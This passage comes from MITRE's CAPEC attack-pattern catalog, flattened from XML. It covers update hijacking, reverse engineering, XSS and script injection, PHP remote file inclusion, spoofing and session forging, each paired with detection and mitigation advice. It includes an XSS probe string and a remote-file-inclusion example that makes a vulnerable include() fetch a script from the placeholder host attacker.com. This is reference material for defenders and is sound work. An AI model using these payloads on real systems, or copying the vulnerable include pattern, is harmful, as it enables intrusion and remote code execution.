mechanisms to trick the user into clicking a link or downloading and installing software. Automated update attacks require the attacker to host a payload and then trigger the installation of the payload code. 494 Targeted 1000 Attack Pattern ChildOf 185 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker exploits a weakness in a server or client's process of delivering and verifying the integrity of code supplied by an update-providing server or mechanism to cause code of the attackers' choosing to be downloaded and installed as a software update. Attacks against automated update mechanisms involve attack vectors which are specific to the type of update mechanism, but typically involve two different attack strategies: redirection or spoofing. Redirection-based attacks exploit two layers of weaknesses in server or client software to undermine the integrity of the target code-base. The first weakness involves a failure to properly authenticate a server as a source of update or patch content. This type of weakness typically results from authentication mechanisms which can be defeated, allowing a hostile server to satisfy the criteria that establish a trust relationship. The second weakness is a systemic failure to validate the identity and integrity of code downloaded from a remote location, hence the inability to distinguish malicious code from a legitimate update. One predominate type of redirection attack requires DNS spoofing or hijacking of a domain name corresponding to an update server. The target software initiates an update request and the DNS request resolves the domain name of the update server to the IP address of the attacker, at which point the software accepts updates either transmitted by or pulled from the attackers' server. Attacks against DNS mechanisms comprise an initial phase of a chain of attacks that facilitate automated update hijacking attack, and such attacks have a precedent in targeted activities that have been as complex as DNS/BIND attacks of corporate infrastructures, to untargeted attacks aimed at compromising home broadband routers, as well as attacks involving the compromise of wireless access points, as well as 'evil twin' attacks coupled with DNS redirection. Due to the plethora of options open to the attacker in forcing name resolution to arbitrary servers the Automated Update Hijacking attack strategies are the tip of the spear for many multi-stage attack chains. The second weakness that is exploited by the attacker is the lack of integrity checking by the software in validating the update. Software which relies only upon domain name resolution to establish the identity of update code is particularly vulnerable, because this signals an absence of other security countermeasures that could be applied to invalidate the attackers' payload on basis of code identity, hashing, signing, encryption, and other integrity checking mechanisms. Redirection-based attack patterns work equally well against client-side software as well as local servers or daemons that provide software update functionality. One precedent of redirection-based attacks involves the active exploitation of Firefox extensions, such as the Google Toolbar, Yahoo Toolbar, Facebook Toolbar, and others. The second strategy employed in Automated Hijacking Attacks are spoofing strategies, including content or identity spoofing, as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers' server. Such attacks have numerous precedents, one in particular being eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking. High 494 Targeted 1000 Attack Pattern ChildOf 186 1000 Attack Pattern ChildOf 105 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker discovers the structure, function, and composition of an object, resource, or system by using a variety of analysis techniques to effectively determine how the analyzed entity was constructed or operates. The goal of reverse engineering is often to duplicate the function, or a part of the function, of an object in order to duplicate or "back engineer" some aspect of its functioning. Reverse engineering techniques can be applied to mechanical objects, electronic devices or components, or to software, although the methodology and techniques involved in each type of analysis differ widely. Low Access to or control of an object, resource, or system, to be analyzed. The technical resources required to engage in reverse engineering differ in accordance with the type of object, resource, or system being analyzed. 798 Targeted 259 Secondary 1000 Attack Pattern ChildOf 281 Wikipedia Reverse engineering The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Reverse_engineering An attacker discovers the structure, function, and composition of a type of computer software by using a variety of analysis techniques to effectively determine how the software functions and operates, or if vulnerabilities or security weakness are present within the implementation. Reverse engineering methods, as applied to software, can utilize a wide number approaches and techniques. Methodologies for software reverse engineering fall into two broad categories, 'white box' and 'black box.' White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution. 'Black Box' methods involve interacting with the software indirectly, in the absence of the ability to measure, instrument, or analyze an executable object directly. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs. Low Reverse engineering of software requires varying tools and methods depending upon whether an executable or other compiled object is present directly for analysis by tools capable of decompiling or monitoring its execution within an operating environment, as in the case of white box methods. Black box methods require (at minimum) the ability to interact with the functional boundaries where the software communicates with a larger processing environment, such as inter-process communication on a host operating system, or via networking protocols. 798 Targeted 259 Secondary 1000 Attack Pattern ChildOf 188 CAPEC Content Team MITRE 2014-02-06 Updated Resources_Required An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The attacker leverages this capability to execute scripts to execute his/her own script by embedding it within other scripts that the target software is likely to execute. The attacker must have the ability to inject script into script that is likely to be executed. If this is done, then the attacker can potentially launch a variety of probes and attacks against the web server's local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. Of course, these attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well. In general all that is required is for there to be sufficient privileges to execute a script, but not protected against writing. Spider Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side script element. These script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc. Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Inputs are used in a script element (script tag, DOM, etc.) and not in another type of element. env-Web Using URL rewriting, parameters may be part of the URL path or the URL fragment. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. These parameters are possibly used in client-side scripts elements. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Probe identified potential entry points for XSS vulnerability The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed. env-Web Manually inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed. env-Web Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a client-side script elements context and observe system behavior to determine if script was executed. env-Web Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes that typically work in a server-side script elements context and observe system behavior to determine if script was executed. env-Web Use a proxy tool to record results of the created requests. env-Web User-controllable input is output back to the browser env-Web User-controllable input is embedded as part of script elements env-Web Output to the browser is not encoded to remove executable scripting syntax env-Web Server-side components execute script elements containing user-controllable input env-Web The attacker's script string is being reflected verbatim at some point in the web site (if not on the same page). Note that sometimes, the payload might be well encoded in the page, but wouldn't be encoded at all in some other section of the same web page (title, etc.) The attacker's script string is executed by the server-side component. All context-sensitive characters are consistently re-encoded before being sent to the web browser. Some sensitive characters are consistently encoded, but others are not. Depending on which type of non-script element the payload is injected in, it may be possible to evade the encodings. Monitor input to web servers (not only GET, but all potential inputs like COOKIES, POST, HEADER), application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard XSS probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input of scripting syntax Do not embed user-controllable input in script elements. Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Steal session IDs, credentials, page content, etc. As the attacker succeeds in exploiting the vulnerability, he can choose to steal user's credentials in order to reuse or to analyze them later on. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and sends document information to the attacker. env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute appropriately. env-Web The attacker gets the user's cookies or other session identifiers. The attacker gets the content of the page the user is viewing. The attacker causes the user's browser to visit a page with malicious content. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Forceful browsing When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user's current network (Internet or not). Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and performs actions on the same web site env-Web Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities). env-Web The attacker indirectly controls the user's browser and makes it performing actions exploiting CSRF. The attacker manipulates the browser through the steps that he designed in his attack. The user, identified on a website, is now performing actions he is not aware of. Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Content spoofing By manipulating the content, the attacker targets the information that the user would like to get from the website. Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim's browser and exposes attacker-modified invalid information to the user on the current web page. env-Web The user sees a page containing wrong information Monitor server logs for scripting parameters. Monitor server logs for referrers. If users are being tricked into clicking XSS links through forums or other web postings, their web browsers will be providing Referrer headers most of the time. These can help indicate that the actual request is illegitimate. Apply appropriate input validation to filter all user-controllable input of scripting syntax Appropriately encode all browser output to avoid scripting syntax Actively monitor the application and either deny or redirect requests from origins that appear to be generating XSS probes. Target software must be able to execute scripts, and also allow attacker to write/upload script High High Injection API Abuse Ajax applications enable rich functionality for browser based web applications. Applications like Google Maps deliver unprecedented ability to zoom in and out, scroll graphics, and change graphic presentation through Ajax. The security issues that an attacker may exploit in this instance are the relative lack of security features in JavaScript and the various browser's implementation of JavaScript, these security gaps are what XSS and a host of other client side vulnerabilities are based on. While Ajax may not open up new security holes, per se, due to the conversational aspects between client and server of Ajax communication, attacks can be optimized. A single zoom in or zoom out on a graphic in an Ajax application may round trip to the server dozens of times. One of the first steps many attackers take is frequently footprinting an environment, this can include scanning local addresses like 192.*.*.* IP addresses, checking local directories, files, and settings for known vulnerabilities, and so on. <IMG SRC=javascript:alert('XSS')> The XSS script that is embedded in a given IMG tag can be manipulated to probe a different address on every click of the mouse or other motions that the Ajax application is aware of. In addition the enumerations allow for the attacker to nest sequential logic in the attacks. While Ajax applications do not open up brand new attack vectors, the existing attack vectors are more than adequate to execute attacks, and now these attacks can be optimized to sequentially execute and enumerate host environments. Low To load malicious script into open, e.g. world writable directory Medium Executing remote scripts on host and collecting output Ability to deploy a custom script on host Design: Use browser technologies that do not allow client side scripting. Design: Utilize strict type, character, and encoding enforcement Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client's browser has no way of discerning where the data is originating from. Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Perform input validation for all remote content. Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Session tokens for specific host Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this. Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity Malicious input delivered through standard script page, e.g. ASP web page Varies with instantiation of attack pattern. May contain network probe or attacks that run against or on host using host account permissions Web server scripting host Enables attacker to execute scripts on remote host 79 Targeted 276 Targeted 279 Secondary 284 Secondary 692 Targeted 697 Targeted 713 Targeted 71 Targeted 1000 Attack Pattern PeerOf 18 1000 Attack Pattern ChildOf 242 333 Category HasMember 341 Penetration Medium High Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.19.1][REF-2] Cigital, Inc 2007-01-01 [R.19.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in ADescription and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in ADescription and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description and Related Attack Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Examples-Instances, Payload, Solutions_and_Mitigations An attacker analyzes a binary file or executable for the purpose of discovering the structure, function, and possibly source-code of the file by using a variety of analysis techniques to effectively determine how the software functions and operates. This type of analysis is also referred to as Reverse Code Engineering, as techniques exist for extracting source code from an executable. Several techniques are often employed for this purpose, both black box and white box. The use of computer bus analyzers and packet sniffers allows the binary to be studied at a level of interactions with its computing environment, such as a host OS, inter-process communication, and/or network communication. This type of analysis falls into the 'black box' category because it involves behavioral analysis of the software without reference to source code, object code, or protocol specifications. White box analysis techniques include file or binary analysis, debugging, disassembly, and decompilation, and generally fall into categories referred to as 'static' and 'dynamic' analysis. Static analysis encompasses methods which analyze the binary, or extract its source code or object code without executing the program. Dynamic analysis involves analyzing the program during execution. Some forms of file analysis tools allow the executable itself to be analyzed, the most basic of which can analyze features of the binary, such as the strings contained within the file. More sophisticated forms of static analysis analyze the binary file and extract assembly code, and possibly source code representations, from analyzing the structure of the file itself. Dynamic analysis tools execute the binary file and monitor its in memory footprint, revealing its execution flow, memory usage, register values, and machine instructions. This type of analysis is most effective for analyzing the execution of binary files whose content has been obfuscated or encrypted in its native executable form. Debuggers allow the program's execution to be monitored, and depending upon the debugger's sophistication may show relevant source code for each step in execution, or may display and allow interactions with memory, variables, or values generated by the program during run-time operations. Disassemblers operate in reverse of assemblers, allowing assembly code to be extracted from a program as it executes machine code instructions. Disassemblers allow low-level interactions with the program as it executes, such as manipulating the program's run time operations. Decompilers can be utilized to analyze a binary file and extract source code from the compiled executable. Collectively, the tools and methods described are those commonly applied to a binary executable file and provide means for reverse engineering the file by revealing the hidden functions of its operation or composition. Low Access to the target file such that it can be analyzed with the appropriate tools. A range of tools suitable for analyzing an executable or its operations 798 Targeted 259 Secondary 1000 Attack Pattern ChildOf 189 1000 Attack Pattern ChildOf 175 Wikipedia Decompiler The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Decompiler Wikipedia Debugger The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Debugger Wikipedia Disassembler The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Disassembler CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker engages in activities to discover any sensitive strings are present within the compiled code of an executable, such as literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the attacker may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions. More sophisticated methods of searching for sensitive strings within a file involve disassembly or decompiling of the file. One could, for example, utilize disassembly methods on an ISAPI executable or dll to discover a hard-coded password within the code as it executes. This type of analysis usually involves four stages in which first a debugger is attached to the running process, anti-debugging countermeasures are circumvented or bypassed, the program is analyzed step-by-step, and breakpoints are established so that discrete functions and data structures can be analyzed. Debugging tools such as SoftICE, Ollydbg, or vendor supplied debugging tools are often used. Disassembly tools such as IDA pro, or similar tools, can also be employed. A third strategy for accessing sensitive strings within a binary involves the decompilation of the file itself into source code that reveals the strings. An example of this type of analysis involves extracting source code from a java JAR file and then using functionality within a java IDE to search the source code for sensitive, hard-coded information. In performing this analysis native java tools, such as "jar" are used to extract the compiled class files. Next, a java decompiler such as "DJ" is used to extract java source code from the compiled classes, revealing source code. Finally, the source code is audited to reveal sensitive information, a step that is usually assisted by source code analysis programs. Low Access to a binary or executable such that it can be analyzed by various utilities. Binary analysis programs such as 'strings' or 'grep', or hex editors. Decompilers such as "DJ" for java, or decompilers designed for specific languages. Debugging programs such as ollydbg, SoftICE, or disassemblers such as IDA Pro. 798 Targeted 259 Secondary 1000 Attack Pattern ChildOf 190 Wikipedia Decompiler The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Decompiler Wikipedia Debugger The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Debugger Wikipedia Disassembler The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Disassembler CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Resources_Required An attacker engages in activities to decipher and/or decode protocol information for a network or application communication protocol used for transmitting information between interconnected nodes or systems on a packet-switched data network. While this type of analysis inherently involves the analysis of a networking protocol, it does not require the presence of an actual or physical network. Although certain techniques for protocol analysis benefit from manipulating live 'on-the-wire' interactions between communicating components, static or dynamic analysis techniques applied to executables as well as to device drivers such as network interface drivers, can also be used to reveal the function and characteristics of a communication protocol implementation. Depending upon the methods used, protocol reverse engineering can involve similar methods as those employed when reverse engineering an executable, or the process may involve observing, interacting, and modifying actual communications occurring between hosts. The goal of protocol reverse engineering is to derive the data transmission syntax, as well as to extract the meaningful content, including packet or content delimiters used by the protocol. This type of analysis is often performed on closed-specification protocols, or proprietary protocols, but is also useful for analyzing publicly available specifications to determine how particular implementations deviate from published specifications. There are several challenges inherent to protocol reverse engineering depending upon the nature of the protocol being analyzed. There may also be other types of factors which complicate the process such as encryption or ad hoc obfuscation of the protocol. In general there are two kinds of networking protocols, each associated with its own challenges and analysis approaches or methodologies. Some protocols are human-readable, which is to say they are text-based protocols. Examples of these types of protocols include HTTP, SMTP, and SOAP. Additionally, application-layer protocols can be embedded or encapsulated within human-readable protocols in the data portion of the packet. Typically, human-readable protocol implementations are susceptible to automatic decoding by the appropriate tools, such as Wireshark/ethereal, tcpdump, or similar protocol sniffers or analyzers. The presence of well-known protocol specifications in addition to easily identified protocol delimiters, such as Carriage Return or Line Feed characters (CRLF) result in text-based protocols susceptibility to direct scrutiny through manual processes. Protocol reverse engineering against protocol implementation such as HTTP is often performed to identify idiosyncratic implementations of a protocol by a server or client. In the case of application-layer protocols which are embedded within text-based protocols, analysis techniques typically benefit from the well-known nature of the encapsulating protocols and can focus on discovering the semantic characteristics of the proprietary protocol or API, since the syntax and protocol delimiters of the underlying protocols can be readily identified. When performing protocol analysis of machine-readable (non-text-based) protocols difficulties emerge as the protocol itself was designed to be read by computing process. Such protocols are typically composed entirely in binary with no apparent syntax, grammar, or structural boundaries. Examples of these types of protocols are IP, UDP, and TCP. Binary protocols with published specifications can be automatically decoded by protocol analyzers, but in the case of proprietary, closed-specification, binary protocols there are no immediate indicators of packet syntax such as packet boundaries, delimiters, or structure, or the presence or absence of encryption or obfuscation. In these cases there is no one technology that can extract or reveal the structure of the packet on the wire, so it is necessary to use trial and error approaches while observing application behavior based on systematic mutations introduced at the packet-level. Tools such as Protocol Debug (PDB) or other packet injection suites are often employed. In cases where the binary executable is available, protocol analysis can be augmented with static and dynamic analysis techniques. Low Access to a binary executable such that it can be analyzed using static and/or dynamic tools, or the ability to observe and interact with a communication channel between communicating processes. Debugging programs such as ollydbg, SoftICE, or disassemblers such as IDA Pro. Packet sniffing or packet analyzing programs such as TCP dump, Wireshark. Specific protocol analysis tools such as PDB (Protocol Debug). Packet injection tools such as pcap or Nemesis. 798 Targeted 259 Secondary 1000 Attack Pattern ChildOf 188 1000 Attack Pattern PeerOf 189 Wikipedia Proprietary protocol The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Proprietary_protocol Wikipedia Reverse engineering The Wikimedia Foundation, Inc http://en.wikipedia.org/wiki/Reverse_engineering CAPEC Content Team MITRE 2014-02-06 Updated Description Summary, Resources_Required In this pattern the attacker is able to load and execute arbitrary code remotely available from the application. This is usually accomplished through an insecurely configured PHP runtime environment and an improperly sanitized "include" or "require" call, which the user can then control to point to any web-accessible file. This allows attackers to hijack the targeted application and force it to execute their own instructions. Survey application Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds. Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery. env-Web URL parameters are used by the application env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Attempt variations on input parameters The attack variants make use of a remotely available PHP script that generates a uniquely identifiable output when executed on the target application server. Possibly using an automated tool, an attacker requests variations on the inputs he surveyed before. He sends parameters that include variations of payloads which include a reference to the remote PHP script. He records all the responses from the server that include the output of the execution of remote PHP script. Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of PHP remote file inclusion payloads which include a reference to the attackers' controlled remote PHP script. env-Web Use a proxy tool to record results of manual input of remote file inclusion probes in known URLs. env-Web The output of the remote PHP script is included in the response web page. env-Web Nothing is returned to the web page. The payload script might have been executed in a different context which wouldn't be included in the response web page env-Web The application returns an error associated with the inclusion of remote file. env-All The application server doesn't download the remote PHP script. env-All The attacker's script is being executed on the application server and an output is being delivered at some point in the web site (if not on the same web page) The remote PHP script doesn't appear to have been executed by the application server. It is possible to create behaviors to monitor the execution such as, for example, the remote PHP script tries to make an HTTP request to an attacker controlled web server, and therefore if the remote PHP script is executed on the application server, the attacker would have evidence in the access log file of his web server. No access to the remote PHP script has been recorded to the access log file of the web server hosting this script Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard Remote File Inclusion (RFI) probes. The majority of attackers use well-known strings to check for vulnerabilities. Use the same vulnerability catalogs that hackers use. Apply appropriate input validation to filter all user-controllable input When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts Actively monitor the application and either deny or redirect requests from origins that appear to be generating RFI probes. When possible, only use the "include", "require", etc. PHP directives with statically define strings Run arbitrary server-side code As the attacker succeeds in exploiting the vulnerability, he is able to execute server-side code within the application. The malicious code has virtual access to the same resources as the targeted application. Note that the attacker might include shell code in his script and execute commands on the server under the same privileges as the PHP runtime is running with. Develop malicious PHP script that is injected through vectors identified during the Experiment Phase and executed by the application server to execute a custom PHP script. env-All The attacker's script is being executed on the application server Monitor server logs for parameters containing URL with references to remote content Apply appropriate input validation to filter all user-controllable input When possible, configure the PHP runtime environment to prevent the execution of remote PHP scripts When possible, only use the "include", "require", etc. PHP directives with statically define strings Target application server must allow remote files to be included in the "require", "include", etc. PHP directives High High Injection The attacker controls a PHP script on a server "http://attacker.com/rfi.txt" The .txt extension is given so that the script doesn't get executed by the attacker.com server, and it will be downloaded as text. The target application is vulnerable to PHP remote file inclusion as following: include($_GET['filename'] . '.txt') The attacker creates an HTTP request that passes his own script in the include: http://example.com/file.php?filename=http://attacker.com/rfi with the concatenation of the ".txt" prefix, the PHP runtime download the attack's script and the content of the script gets executed in the same context as the rest of the original script. Low To inject the malicious payload in a web page Medium To bypass filters in the application Ability to send HTTP request to a web application Ability to store PHP scripts on a server Implementation: Perform input validation for all remote content, including remote and user-generated content Implementation: Only allow known files to be included (whitelist) Implementation: Make use of indirect references passed in URL parameters instead of file names Configuration: Ensure that remote scripts cannot be include in the "include" or "require" PHP directives Integrity Modify files or directories Confidentiality Read files or directories Integrity Modify application data Confidentiality Read application data Authorization Execute unauthorized code or commands Run Arbitrary Code Accountability Authentication Authorization Non-Repudiation Gain privileges / assume identity Access_Control Authorization Bypass protection mechanism Any HTTP Request transport variables (GET, POST, etc.) Application server running PHP where the script is executed Application server may be used to steal information such as code, create custom queries to the databases, etc. Since the attackers' script runs within the same context as the application it is injected in, it has virtually the same capabilities. 98 Targeted 80 Targeted 714 Targeted 1000 Category ChildOf 253 Exploitation Penetration High High High Client-Server SOA All All PHP WASC Threat Classification 2.0 WASC-05 - Remote File Inclusion The Web Application Security Consortium (WASC) 2010 http://projects.webappsec.org/Remote-File-Inclusion Shaun Clowes A Study In Scarlet, Exploiting Common Vulnerabilities in PHP Applications Blackhat Briefings Asia 2001 http://www.securereality.com.au/studyinscarlet.txt OWASP Top 10 Top 10 2007 - Malicious File Execution 2007 The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Top_10_2007-A3 Romain Gaucher Cigital, Inc. Pre-review - 0.1 MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Romain Gaucher Cigital, Inc. Pre-review - 0.1 CAPEC Content Team MITRE 2013-12-18 Updated Examples-Instances, Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Payload_Activation_Impact The attacker provides data under a falsified identity. The purpose of using the falsified identity may be to prevent traceability of the provided data or it might be an attempt by the attacker to assume the rights granted to another identity. One of the simplest forms of this attack would be the creation of an email message with a modified "From" field in order to appear that the message was sent from someone other than the actual sender. Results of the attack vary depending on the details of the attack, but common results include privilege escalation, obfuscation of other attacks, and data corruption/manipulation. This attack represents a subset of the Identity Spoofing and Content Spoofing attacks. Identity spoofing is a broader pattern, including situations where no data is exchange (for example, logging into a computer under an assumed name). Content Spoofing is likewise very similar, but would include cases where there is not an active attempt to fake a data source (for example, appending content onto an existing email message without changing the From field would be considered Content Spoofing, but not Faking the Source of Data since the data source was not faked). The target application must associate data with its source. This association could be as simple as logging the source of the data (in which case this attack seeks to create a false trail in the log) or the target application could associate some increased level of access with certain identities (in which case an attacker might seek to impersonate those identities in order to increase privileges). Medium Resources required vary depending on the nature of the attack. Possible tools needed by an attacker could include tools to create custom network packets, specific client software, and tools to capture network traffic. Many variants of this attack require no attacker resources, however. 601 Targeted 1000 Attack Pattern ChildOf 148 CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker crafts a message that masquerades as a message from a person other than the actual message sender. This attack is a subset of the Identity Spoofing attack in that Principal Spoofing refers to pretending to be some other person in an interaction while Identity Spoofing refers to assuming the identity of any entity. As such, impersonating a server would be Identity Spoofing but not Principal Spoofing. The possible outcomes of Principal Spoofing mirror those of Identity Spoofing. (E.g. escalation of privilege and false attribution of data or activities.) Likewise, most techniques for Identity Spoofing (crafting messages or intercepting and replaying or modifying messages) can be used for a Principal Spoofing attack. However, because Principal Spoofing is used to impersonate a person, social engineering can be both an attack technique (using social techniques to generate evidence in support of a false identity) as well as a possible outcome (manipulating people's perceptions by making statements or performing actions under a target's name). The target must associate data or activities with a person's identity and the attacker must be able to modify this identity without detection. Medium No special resources are required for most variants of this attack. 1000 Attack Pattern ChildOf 151 An attacker creates a false but functional session credential in order to gain or usurp access to a service. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. If an attacker is able to forge valid session credentials they may be able to bypass authentication or piggy-back off some other authenticated user's session. This attack differs from Reuse of Session IDs and Session Sidejacking attacks in that in the latter attacks an attacker uses a previous or existing credential without modification while, in a forging attack, the attacker must create their own credential, although it may be based on previously observed credentials. Analyze and Understand Session IDs The attacker finds that the targeted application use session credentials to identify legitimate users. An attacker makes many anonymous connections and records the session IDs. env-Web An attacker makes authorized connections and records the session tokens or credentials. env-Web Valid session information env-Web No valid session information env-Web The attacker models the session ID 